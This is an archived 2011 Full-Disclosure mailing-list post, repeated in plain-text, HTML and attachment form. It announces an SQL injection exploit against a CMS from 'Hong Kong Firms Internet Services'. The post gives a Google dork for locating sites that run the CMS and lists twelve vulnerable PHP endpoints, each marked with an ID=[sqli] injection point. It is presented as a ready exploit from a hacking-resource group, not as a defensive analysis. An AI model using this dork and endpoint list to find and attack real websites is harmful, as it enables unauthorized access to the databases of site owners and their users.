'[Full-disclosure] Hong Kong Firms Internet Services CMS Sql'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Hong Kong Firms Internet Services CMS Sql
From:       cyber netron <cybernetron () gmail ! com>
Date:       2011-07-31 5:48:09
Message-ID: CAJttGjmUid-p9D3zaX3SG8DhHWz-6-_F3Nr9N565iZ64xCCMtw () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


.__.__                .__                   __
|__|  |   _____  __ __|  |__ _____    ____ |  | __ ___________
|  |  |  /     \|  |  \  |  \\__  \ _/ ___\|  |/ // __ \_  __ \
|  |  |_|  Y Y  \  |  /   Y  \/ __ \\  \___|    <\  ___/|  | \/
|__|____/__|_|  /____/|___|  (____  /\___  >__|_ \\___  >__|
              \/           \/     \/     \/     \/    \/
                                                    .org
################################ Archieve an Resource About Hacking #####
#################### ################################################
#
# Exploit Title: Hong Kong Firms Internet Services CMS Sql Injection
Vulnerability
# Author: Netrondoank Aka netron
# home Page: http://www.ilmuhacker.org
# Forum : http://www.indonesiansecurity.info
# Vendor or Software Link: http://www.h-k.com.hk
# Version: N/A
# Category:: webapps
# Google dork: "Powered by Hong Kong Firms Internet Services"
# Tested on: Linux Back Track 5

####################################################################
#  Proof Of Concept [POC]

http://site/newsdetail.php?ID=[sqli]
http://site/bespoke/events2.php?ID=[sqli]
http://site/news-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/service.php?ID=[sqli]
http://site/detail.php?ID=[sqli]
http://site/e-detail.php?ID=[sqli]
http://site/product-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/newsletterdetail.php?ID=[sqli]
http://site/servicedetail.php?ID=[sqli]
http://site/shop-detail.php?ID=[sqli]

#########################################################################################
#Greetz To:
Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com
packetstormsecurity.org, Exploit-id.com ,securityreason.com ,
securityfocus.com
##########################################################################################
###############################  Archieve an Resource About
Hacking--Ilmuhackerdotorg ###########

[Attachment #5 (text/html)]

.__.__                .__                   __                 <br>|__|  |   _____  __ __|  |__ \
_____    ____ |  | __ ___________ <br>|  |  |  /     \|  |  \  |  \\__  \ _/ ___\|  |/ // __ \_ \
__ \<br>|  |  |_|  Y Y  \  |  /   Y  \/ __ \\  \___|    &lt;\  ___/|  | \/<br> |__|____/__|_|  \
/____/|___|  (____  /\___  &gt;__|_ \\___  &gt;__|   <br>              \/           \/     \/   \
\/     \/    \/        <br>                                                    \
.org<br>################################ Archieve an Resource About Hacking #####<br> \
#################### ################################################<br>#<br># Exploit Title: \
Hong Kong Firms Internet Services CMS Sql Injection Vulnerability<br># Author: Netrondoank Aka \
netron<br># home Page: <a href="http://www.ilmuhacker.org">http://www.ilmuhacker.org</a><br> # \
Forum : <a href="http://www.indonesiansecurity.info">http://www.indonesiansecurity.info</a><br># \
Vendor or Software Link: <a href="http://www.h-k.com.hk">http://www.h-k.com.hk</a><br># \
Version: N/A<br># Category:: webapps<br> # Google dork: &quot;Powered by Hong Kong Firms \
Internet Services&quot;<br># Tested on: Linux Back Track \
5<br><br>####################################################################<br>#  Proof Of \
Concept [POC]<br><br><a \
href="http://site/newsdetail.php?ID=[sqli]">http://site/newsdetail.php?ID=[sqli]</a><br> <a \
href="http://site/bespoke/events2.php?ID=[sqli]">http://site/bespoke/events2.php?ID=[sqli]</a><br><a \
href="http://site/news-detail.php?ID=[sqli]">http://site/news-detail.php?ID=[sqli]</a><br><a \
href="http://site/productdetail.php?ID=[sqli]">http://site/productdetail.php?ID=[sqli]</a><br> \
<a href="http://site/service.php?ID=[sqli]">http://site/service.php?ID=[sqli]</a><br><a \
href="http://site/detail.php?ID=[sqli]">http://site/detail.php?ID=[sqli]</a><br><a \
href="http://site/e-detail.php?ID=[sqli]">http://site/e-detail.php?ID=[sqli]</a><br> <a \
href="http://site/product-detail.php?ID=[sqli]">http://site/product-detail.php?ID=[sqli]</a><br><a \
href="http://site/productdetail.php?ID=[sqli]">http://site/productdetail.php?ID=[sqli]</a><br><a \
href="http://site/newsletterdetail.php?ID=[sqli]">http://site/newsletterdetail.php?ID=[sqli]</a><br>
 <a href="http://site/servicedetail.php?ID=[sqli]">http://site/servicedetail.php?ID=[sqli]</a><br><a \
href="http://site/shop-detail.php?ID=[sqli]">http://site/shop-detail.php?ID=[sqli]</a><br><br>## \
#######################################################################################<br> \
#Greetz To:<br>Allah swt .free dom For Palestine .Indonesiansecurity.info, <a \
href="http://1337day.com">1337day.com</a><br><a \
href="http://packetstormsecurity.org">packetstormsecurity.org</a>, Exploit-id.com ,<a \
href="http://securityreason.com">securityreason.com</a> ,<a \
href="http://securityfocus.com">securityfocus.com</a><br> \
##########################################################################################<br>############################### \
Archieve an Resource About Hacking--Ilmuhackerdotorg ###########<br><br>

--001636e0a57e35553604a9570f9e--


["new poc Hong Kong Firms Internet Services CMS Sql Injection
	Vulnerability.txt" (text/plain)]

.__.__                .__                   __                 
|__|  |   _____  __ __|  |__ _____    ____ |  | __ ___________ 
|  |  |  /     \|  |  \  |  \\__  \ _/ ___\|  |/ // __ \_  __ \
|  |  |_|  Y Y  \  |  /   Y  \/ __ \\  \___|    <\  ___/|  | \/
|__|____/__|_|  /____/|___|  (____  /\___  >__|_ \\___  >__|   
              \/           \/     \/     \/     \/    \/        
                                                    .org
################################ Archieve an Resource About Hacking ###############
#################### ####################
#
# Exploit Title: Hong Kong Firms Internet Services CMS Sql Injection Vulnerability
# Author: Netrondoank Aka netron
# home Page: http://www.ilmuhacker.org
# Forum : http://www.indonesiansecurity.info
# Vendor or Software Link: http://www.h-k.com.hk
# Version: N/A
# Category:: webapps
# Google dork: "Powered by Hong Kong Firms Internet Services"
# Tested on: Linux Back Track 5

####################################################################
#  Proof Of Concept [POC]

http://site/newsdetail.php?ID=[sqli]
http://site/bespoke/events2.php?ID=[sqli]
http://site/news-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/service.php?ID=[sqli]
http://site/detail.php?ID=[sqli]
http://site/e-detail.php?ID=[sqli]
http://site/product-detail.php?ID=[sqli]
http://site/productdetail.php?ID=[sqli]
http://site/newsletterdetail.php?ID=[sqli]
http://site/servicedetail.php?ID=[sqli]
http://site/shop-detail.php?ID=[sqli]

#########################################################################################
#Greetz To:
Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com
packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com
##########################################################################################
###############################  Archieve an Resource About Hacking--Ilmuhackerdotorg ####


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic